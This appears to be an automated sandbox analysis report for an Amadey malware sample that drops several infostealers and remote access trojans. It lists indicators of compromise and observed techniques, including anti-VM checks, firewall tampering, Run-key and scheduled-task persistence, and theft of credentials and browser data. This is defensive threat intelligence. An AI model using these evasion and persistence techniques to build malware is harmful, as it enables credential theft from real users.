amadey | 654114fbba05ee72867b0bc8ad925046cfbd9642c329a4e11035f534bacb3591

Windows Service

T1543.003

Processes:

9s3HoD6vGqGQPo6BT2pzsOGw.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1"	9s3HoD6vGqGQPo6BT2pzsOGw.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 6 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe	family_redline
C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe	family_redline
behavioral2/memory/1864-277-0x0000000000A80000-0x0000000000AD2000-memory.dmp	family_redline
behavioral2/memory/2484-282-0x00000000001F0000-0x00000000002B0000-memory.dmp	family_redline
C:\Users\Admin\AppData\Local\Temp\1000152001\jok.exe	family_redline
behavioral2/memory/3684-360-0x0000000000020000-0x0000000000072000-memory.dmp	family_redline

RisePro
RisePro stealer is an infostealer distributed by PrivateLoader.
stealer risepro
Stealc
Stealc is an infostealer written in C++.
stealer stealc
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 8 IoCs

evasion

Query Registry

Virtualization/Sandbox Evasion

Processes:

9s3HoD6vGqGQPo6BT2pzsOGw.exe654114fbba05ee72867b0bc8ad925046cfbd9642c329a4e11035f534bacb3591.exeexplorta.exeexplorta.exeamert.exe2c03579092.exechrosha.exeexplorta.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	9s3HoD6vGqGQPo6BT2pzsOGw.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	654114fbba05ee72867b0bc8ad925046cfbd9642c329a4e11035f534bacb3591.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorta.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorta.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	amert.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	2c03579092.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	chrosha.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorta.exe

Blocklisted process makes network request 2 IoCs

Processes:

rundll32.exerundll32.exe

flow pid process

61 5140 rundll32.exe
82 5848 rundll32.exe
Downloads MZ/PE file
Modifies Windows Firewall 2 TTPs 2 IoCs
evasion

Windows Service
T1543.003

Disable or Modify System Firewall
T1562.004

Processes:

netsh.exenetsh.exe

pid process

4888 netsh.exe
3844 netsh.exe

flow	pid	process
61	5140	rundll32.exe
82	5848	rundll32.exe

pid	process
4888	netsh.exe
3844	netsh.exe

Checks BIOS information in registry 2 TTPs 16 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

Processes:

chrosha.exe654114fbba05ee72867b0bc8ad925046cfbd9642c329a4e11035f534bacb3591.exeexplorta.exeamert.exeexplorta.exe9s3HoD6vGqGQPo6BT2pzsOGw.exeexplorta.exe2c03579092.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	chrosha.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	654114fbba05ee72867b0bc8ad925046cfbd9642c329a4e11035f534bacb3591.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorta.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	amert.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorta.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	chrosha.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	9s3HoD6vGqGQPo6BT2pzsOGw.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorta.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	amert.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	2c03579092.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorta.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	2c03579092.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	9s3HoD6vGqGQPo6BT2pzsOGw.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	654114fbba05ee72867b0bc8ad925046cfbd9642c329a4e11035f534bacb3591.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorta.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorta.exe

Executes dropped EXE 32 IoCs

Processes:

explorta.exeexplorta.exeamert.exe8a14325f02.exe2c03579092.exechrosha.exeexplorta.exeswiiiii.exealexxxxxxxx.exetrf.exekeks.exegold.exeNewB.exejok.exeswiiii.exefile300un.exemstc.exeloader.exexf34C1uoc4EnKcwdtLQTFQEf.exeVAd2LBJDml5xeUucS9EAra8f.exeopvxoSGfg9kPcG9AeGBMIMOM.exeu47o.0.exerun.exeu47o.3.exe0RVOkCttMp6duWJry0Gs9Wia.exe0RVOkCttMp6duWJry0Gs9Wia.exe0RVOkCttMp6duWJry0Gs9Wia.exe0RVOkCttMp6duWJry0Gs9Wia.exe0RVOkCttMp6duWJry0Gs9Wia.exeVAd2LBJDml5xeUucS9EAra8f.exeopvxoSGfg9kPcG9AeGBMIMOM.exe9s3HoD6vGqGQPo6BT2pzsOGw.exe

pid	process
2492	explorta.exe
1592	explorta.exe
3684	amert.exe
2060	8a14325f02.exe
3020	2c03579092.exe
4956	chrosha.exe
2828	explorta.exe
2712	swiiiii.exe
4328	alexxxxxxxx.exe
2484	trf.exe
1864	keks.exe
328	gold.exe
2108	NewB.exe
3684	jok.exe
1524	swiiii.exe
3772	file300un.exe
5244	mstc.exe
5728	loader.exe
5460	xf34C1uoc4EnKcwdtLQTFQEf.exe
4796	VAd2LBJDml5xeUucS9EAra8f.exe
5680	opvxoSGfg9kPcG9AeGBMIMOM.exe
5740	u47o.0.exe
2348	run.exe
3636	u47o.3.exe
5980	0RVOkCttMp6duWJry0Gs9Wia.exe
5072	0RVOkCttMp6duWJry0Gs9Wia.exe
4216	0RVOkCttMp6duWJry0Gs9Wia.exe
5412	0RVOkCttMp6duWJry0Gs9Wia.exe
5144	0RVOkCttMp6duWJry0Gs9Wia.exe
2128	VAd2LBJDml5xeUucS9EAra8f.exe
5380	opvxoSGfg9kPcG9AeGBMIMOM.exe
2880	9s3HoD6vGqGQPo6BT2pzsOGw.exe

Identifies Wine through registry keys 2 TTPs 7 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

Virtualization/Sandbox Evasion

Processes:

chrosha.exeexplorta.exe654114fbba05ee72867b0bc8ad925046cfbd9642c329a4e11035f534bacb3591.exeexplorta.exeexplorta.exeamert.exe2c03579092.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Wine	chrosha.exe
Key opened	\REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Wine	explorta.exe
Key opened	\REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Wine	654114fbba05ee72867b0bc8ad925046cfbd9642c329a4e11035f534bacb3591.exe
Key opened	\REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Wine	explorta.exe
Key opened	\REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Wine	explorta.exe
Key opened	\REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Wine	amert.exe
Key opened	\REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Wine	2c03579092.exe

Loads dropped DLL 9 IoCs

Processes:

rundll32.exerundll32.exerun.exerundll32.exe0RVOkCttMp6duWJry0Gs9Wia.exe0RVOkCttMp6duWJry0Gs9Wia.exe0RVOkCttMp6duWJry0Gs9Wia.exe0RVOkCttMp6duWJry0Gs9Wia.exe0RVOkCttMp6duWJry0Gs9Wia.exe

pid	process
1852	rundll32.exe
5140	rundll32.exe
2348	run.exe
5848	rundll32.exe
5980	0RVOkCttMp6duWJry0Gs9Wia.exe
5072	0RVOkCttMp6duWJry0Gs9Wia.exe
4216	0RVOkCttMp6duWJry0Gs9Wia.exe
5412	0RVOkCttMp6duWJry0Gs9Wia.exe
5144	0RVOkCttMp6duWJry0Gs9Wia.exe

Reads WinSCP keys stored on the system 2 TTPs
Tries to access WinSCP stored sessions.
spyware stealer

Data from Local System
T1005

Credentials in Registry
T1552.002
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Themida packer 3 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
C:\Users\Admin\Pictures\9s3HoD6vGqGQPo6BT2pzsOGw.exe	themida
behavioral2/memory/2880-948-0x0000000140000000-0x0000000140749000-memory.dmp	themida
behavioral2/memory/2880-1067-0x0000000140000000-0x0000000140749000-memory.dmp	themida

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

Processes:

loader.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	loader.exe
Key opened	\REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	loader.exe
Key opened	\REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	loader.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

Processes:

explorta.exemstc.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Microsoft\Windows\CurrentVersion\Run\8a14325f02.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000016001\\8a14325f02.exe"	explorta.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Microsoft\Windows\CurrentVersion\Run\2c03579092.exe = "C:\\Users\\Admin\\1000017002\\2c03579092.exe"	explorta.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe"	mstc.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

Processes:

9s3HoD6vGqGQPo6BT2pzsOGw.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	9s3HoD6vGqGQPo6BT2pzsOGw.exe

Enumerates connected drives 3 TTPs 4 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

Processes:

0RVOkCttMp6duWJry0Gs9Wia.exe0RVOkCttMp6duWJry0Gs9Wia.exe

description	ioc	process
File opened (read-only)	\??\D:	0RVOkCttMp6duWJry0Gs9Wia.exe
File opened (read-only)	\??\F:	0RVOkCttMp6duWJry0Gs9Wia.exe
File opened (read-only)	\??\D:	0RVOkCttMp6duWJry0Gs9Wia.exe
File opened (read-only)	\??\F:	0RVOkCttMp6duWJry0Gs9Wia.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

15 pastebin.com
62 pastebin.com
Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

16 ipinfo.io
38 api.myip.com
95 api.myip.com
98 ipinfo.io
14 ip-api.com

flow	ioc
15	pastebin.com
62	pastebin.com

flow	ioc
16	ipinfo.io
38	api.myip.com
95	api.myip.com
98	ipinfo.io
14	ip-api.com

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\1000016001\8a14325f02.exe	autoit_exe

Drops file in System32 directory 4 IoCs

Processes:

9s3HoD6vGqGQPo6BT2pzsOGw.exe

description	ioc	process
File opened for modification	C:\Windows\System32\GroupPolicy	9s3HoD6vGqGQPo6BT2pzsOGw.exe
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	9s3HoD6vGqGQPo6BT2pzsOGw.exe
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	9s3HoD6vGqGQPo6BT2pzsOGw.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	9s3HoD6vGqGQPo6BT2pzsOGw.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs

Processes:

654114fbba05ee72867b0bc8ad925046cfbd9642c329a4e11035f534bacb3591.exeexplorta.exeexplorta.exeamert.exe2c03579092.exechrosha.exeexplorta.exe9s3HoD6vGqGQPo6BT2pzsOGw.exe

pid	process
2184	654114fbba05ee72867b0bc8ad925046cfbd9642c329a4e11035f534bacb3591.exe
2492	explorta.exe
1592	explorta.exe
3684	amert.exe
3020	2c03579092.exe
4956	chrosha.exe
2828	explorta.exe
2880	9s3HoD6vGqGQPo6BT2pzsOGw.exe

Suspicious use of SetThreadContext 6 IoCs

Processes:

swiiiii.exealexxxxxxxx.exegold.exeswiiii.exefile300un.exerun.exe

description	pid	process	target process
PID 2712 set thread context of 1020	2712	swiiiii.exe	RegAsm.exe
PID 4328 set thread context of 2868	4328	alexxxxxxxx.exe	RegAsm.exe
PID 328 set thread context of 4872	328	gold.exe	RegAsm.exe
PID 1524 set thread context of 3464	1524	swiiii.exe	RegAsm.exe
PID 3772 set thread context of 5856	3772	file300un.exe	regsvcs.exe
PID 2348 set thread context of 4204	2348	run.exe	cmd.exe

Drops file in Windows directory 2 IoCs

Processes:

654114fbba05ee72867b0bc8ad925046cfbd9642c329a4e11035f534bacb3591.exeamert.exe

description	ioc	process
File created	C:\Windows\Tasks\explorta.job	654114fbba05ee72867b0bc8ad925046cfbd9642c329a4e11035f534bacb3591.exe
File created	C:\Windows\Tasks\chrosha.job	amert.exe

Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exe

pid process

1268 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

pid	process
1268	sc.exe

Program crash 4 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
4796	2712	WerFault.exe	swiiiii.exe
1068	4328	WerFault.exe	alexxxxxxxx.exe
1740	328	WerFault.exe	gold.exe
3460	5460	WerFault.exe	xf34C1uoc4EnKcwdtLQTFQEf.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

Processes:

u47o.3.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u47o.3.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u47o.3.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u47o.3.exe

Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

1744 schtasks.exe
2192 schtasks.exe
3552 schtasks.exe
2892 schtasks.exe
7144 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

1116 timeout.exe

pid	process
1744	schtasks.exe
2192	schtasks.exe
3552	schtasks.exe
2892	schtasks.exe
7144	schtasks.exe

pid	process
1116	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

System Information Discovery

Processes:

chrome.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

VAd2LBJDml5xeUucS9EAra8f.exepowershell.exepowershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2412 = "Marquesas Standard Time"	VAd2LBJDml5xeUucS9EAra8f.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-752 = "Tonga Standard Time"	VAd2LBJDml5xeUucS9EAra8f.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1021 = "Bangladesh Daylight Time"	VAd2LBJDml5xeUucS9EAra8f.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-682 = "E. Australia Standard Time"	VAd2LBJDml5xeUucS9EAra8f.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-681 = "E. Australia Daylight Time"	VAd2LBJDml5xeUucS9EAra8f.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-341 = "Egypt Daylight Time"	VAd2LBJDml5xeUucS9EAra8f.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-741 = "New Zealand Daylight Time"	VAd2LBJDml5xeUucS9EAra8f.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2322 = "Sakhalin Standard Time"	VAd2LBJDml5xeUucS9EAra8f.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1042 = "Ulaanbaatar Standard Time"	VAd2LBJDml5xeUucS9EAra8f.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-842 = "Argentina Standard Time"	VAd2LBJDml5xeUucS9EAra8f.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2432 = "Cuba Standard Time"	VAd2LBJDml5xeUucS9EAra8f.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-732 = "Fiji Standard Time"	VAd2LBJDml5xeUucS9EAra8f.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-371 = "Jerusalem Daylight Time"	VAd2LBJDml5xeUucS9EAra8f.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1862 = "Russia TZ 6 Standard Time"	VAd2LBJDml5xeUucS9EAra8f.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2002 = "Cabo Verde Standard Time"	VAd2LBJDml5xeUucS9EAra8f.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-491 = "India Daylight Time"	VAd2LBJDml5xeUucS9EAra8f.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-621 = "Korea Daylight Time"	VAd2LBJDml5xeUucS9EAra8f.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1801 = "Line Islands Daylight Time"	VAd2LBJDml5xeUucS9EAra8f.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-671 = "AUS Eastern Daylight Time"	VAd2LBJDml5xeUucS9EAra8f.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1661 = "Bahia Daylight Time"	VAd2LBJDml5xeUucS9EAra8f.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-361 = "GTB Daylight Time"	VAd2LBJDml5xeUucS9EAra8f.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-31 = "Mid-Atlantic Daylight Time"	VAd2LBJDml5xeUucS9EAra8f.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-571 = "China Daylight Time"	VAd2LBJDml5xeUucS9EAra8f.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-231 = "Hawaiian Daylight Time"	VAd2LBJDml5xeUucS9EAra8f.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-542 = "Myanmar Standard Time"	VAd2LBJDml5xeUucS9EAra8f.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-52 = "Greenland Standard Time"	VAd2LBJDml5xeUucS9EAra8f.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-272 = "Greenwich Standard Time"	VAd2LBJDml5xeUucS9EAra8f.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-492 = "India Standard Time"	VAd2LBJDml5xeUucS9EAra8f.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-372 = "Jerusalem Standard Time"	VAd2LBJDml5xeUucS9EAra8f.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-391 = "Arab Daylight Time"	VAd2LBJDml5xeUucS9EAra8f.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-51 = "Greenland Daylight Time"	VAd2LBJDml5xeUucS9EAra8f.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-541 = "Myanmar Daylight Time"	VAd2LBJDml5xeUucS9EAra8f.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2391 = "Aleutian Daylight Time"	VAd2LBJDml5xeUucS9EAra8f.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-662 = "Cen. Australia Standard Time"	VAd2LBJDml5xeUucS9EAra8f.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2531 = "Chatham Islands Daylight Time"	VAd2LBJDml5xeUucS9EAra8f.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-962 = "Paraguay Standard Time"	VAd2LBJDml5xeUucS9EAra8f.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1721 = "Libya Daylight Time"	VAd2LBJDml5xeUucS9EAra8f.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2842 = "Saratov Standard Time"	VAd2LBJDml5xeUucS9EAra8f.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-442 = "Arabian Standard Time"	VAd2LBJDml5xeUucS9EAra8f.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-672 = "AUS Eastern Standard Time"	VAd2LBJDml5xeUucS9EAra8f.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-292 = "Central European Standard Time"	VAd2LBJDml5xeUucS9EAra8f.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-335 = "Jordan Standard Time"	VAd2LBJDml5xeUucS9EAra8f.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
